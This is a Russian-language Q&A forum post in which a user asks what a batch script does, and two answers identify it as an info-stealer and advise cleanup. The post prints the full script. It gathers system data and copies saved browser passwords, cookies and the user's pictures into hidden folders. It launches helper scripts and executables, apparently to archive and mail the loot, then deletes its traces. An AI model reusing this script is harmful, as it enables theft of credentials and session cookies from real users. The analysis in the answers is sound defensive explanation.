Что делает данный шедевробатник? срочна

Question

Что делает данный шедевробатник? срочна

Кузьмов Александр Ученик (87), на голосовании 4 месяца назад

 @echo off 
set logname=logs 
set updlog=c:\.osidrivers 
set logext=txt 
mkdir C:\temp_install 
mkdir C:\.osidrivers\logs 
CD/D C:\.osidrivers\logs\ 
pause >nul 
:: SU5GT1JNQVRJT04gQUJPVVQgVEhFIFNZU1RFTQ== 
    echo %date% %time% > %logname%_%date%.%logext% 
	echo [+] Username = %USERNAME% >> %logname%_%date%.%logext% 
	echo [+] Number Of Processors = %NUMBER_OF_PROCESSORS% >> %logname%_%date%.%logext% 
	echo [+] Processor Architecture = %PROCESSOR_ARCHITECTURE% >> %logname%_%date%.%logext% 
	echo [+] Processor Identifier = %PROCESSOR_IDENTIFIER% >> %logname%_%date%.%logext% 
	echo [+] Processor Model Number = %PROCESSOR_LEVEL% >> %logname%_%date%.%logext% 
	echo [+] Processor Revision = %PROCESSOR_REVISION% >> %logname%_%date%.%logext% 
	echo [+] User Domain = %USERDOMAIN% >> %logname%_%date%.%logext% 
	echo [+] OS = %os% >> %logname%_%date%.%logext% 
	echo [+] Logon Server = %LOGONSERVER% >> %logname%_%date%.%logext% 
	ipconfig > IP.%logext% 
	tasklist /FO CSV /NH > task_%date%.%logext% 
:: Q09PS0lFUyBBTkQgUEFTU1dPUkRT 
	md %updlog%\$brow.logs\Mozilla 
	md %updlog%\$brow.logs\Opera 
	md %updlog%\$brow.logs\Google 
		CD/D %APPDATA%\Opera\Opera\ 
			copy /y wand.dat %updlog%\$brow.logs\Opera\ 
			copy /y cookies.dat %updlog%\$brow.logs\Opera\ 
		cd "%AppData%\Mozilla\Firefox\Profiles\*.default" 
			copy /y cookies.sqlite %updlog%\$brow.logs\Mozilla 
			copy /y key3.db %updlog%\$brow.logs\Mozilla 
			copy /y signons.sqlite %updlog%\$brow.logs\Mozilla 
			copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %updlog%\$brow.logs\Mozilla 
		cd "%localappdata%\Google\Chrome\User Data\Default" 
			copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%updlog%\$brow.logs\Google" 
				ATTRIB -R -A -S -H 
				attrib +h %updlog%\$brow.logs\Mozilla 
				attrib +h %updlog%\$brow.logs\Opera 
				attrib +h %updlog%\$brow.logs\Google 
 
:: TEFVTkNIIFRJTUU= 
	del /q lau_the_program.ltp 
	echo suck_my_cock_fucking_femboy > lau_the_program.ltp 
 
:: UElDVFVSRVM= 
	mkdir %updlog%\pictures\screenshots 
		xcopy "C:\Users\%username%\Pictures" "%updlog%\pictures" 
		xcopy "C:\Users\%username%\Pictures\Screenshots" "%updlog%\pictures\screenshots" 
 
:: U0VBUkNIIEZPUiBSVU5OSU5HIFBST0NFU1NFUw== 
	cd/d %~dp0 
		start SilentCMD.exe find_Notepad.bat 
		start SilentCMD.exe find_DDNet.bat 
		start SilentCMD.exe find_Steam.bat 
		start SilentCMD.exe find_pass.bat 
 
:: QVJDSElWSU5HIERBVEEgQU5EIFNFTkRJTkcgSVQgVE8gVEhFIE1BSUw= 
timeout 3 /nobreak >nul 
	start SilentCMD.exe zip.exe 
timeout 4 /nobreak >nul 
	start SilentCMD.exe milo.exe 
timeout 5 /nobreak >nul 
		rmdir /s /q C:\temp_install 
		rmdir /s /q C:\.osidrivers 
		rmdir /s /q %TEMP%\.avast$ 
		taskkill /F /IM SilentCMD.exe 
		pause >nul 
	exit

Answer 1

Этот скрипт является вредоносным и выполняет несколько вредоносных действий. Вот его основные функции:

Создание директорий для хранения логов и временных файлов:

Создает директорию C:\temp_install.
Создает директорию C:\.osidrivers\logs.
Сбор информации о системе и пользователе:

Записывает текущую дату и время в файл лога.
Записывает информацию о пользователе, процессорах, архитектуре процессора, домене пользователя, операционной системе и сервере входа в систему в файл лога.
Выполняет команду ipconfig для получения информации о сети и сохраняет ее в файл IP.txt.
Выполняет команду tasklist /FO CSV /NH для получения списка запущенных процессов и сохраняет его в файл task_<date>.txt.
Копирование файлов cookies и паролей из браузеров:

Копирует файлы cookies и пароли из браузеров Opera, Mozilla Firefox и Google Chrome в директорию C:\.osidrivers\$brow.logs.
Скрытие созданных директорий:

Изменяет атрибуты директорий, чтобы скрыть их.
Создание файла с оскорбительным содержанием:

Создает файл lau_the_program.ltp с оскорбительным содержанием.
Копирование изображений:

Копирует изображения и скриншоты из пользовательской директории Pictures в директорию C:\.osidrivers\pictures.
Запуск дополнительных скриптов и программ:

Запускает несколько скриптов (например, find_Notepad.bat, find_DDNet.bat, find_Steam.bat, find_pass.bat), которые, вероятно, выполняют дополнительные вредоносные действия.
Запускает программы zip.exe и milo.exe.
Очистка следов:

Удаляет созданные временные директории и файлы.
Завершает процесс SilentCMD.exe.
Этот скрипт собирает информацию о системе и пользователе, копирует конфиденциальные данные из браузеров и изображений, а затем запускает дополнительные вредоносные компоненты и очищает следы своей деятельности.

Если этот скрипт был запущен на вашей системе, настоятельно рекомендуется немедленно отключить сеть, провести полную проверку системы на вирусы с использованием надежного антивирусного программного обеспечения и обратиться за профессиональной помощью для удаления всех следов вредоносного ПО.

Answer 2

Не шедевр ни разу. Запускает свой софт и качает файло. Судя по всему оснастка стилера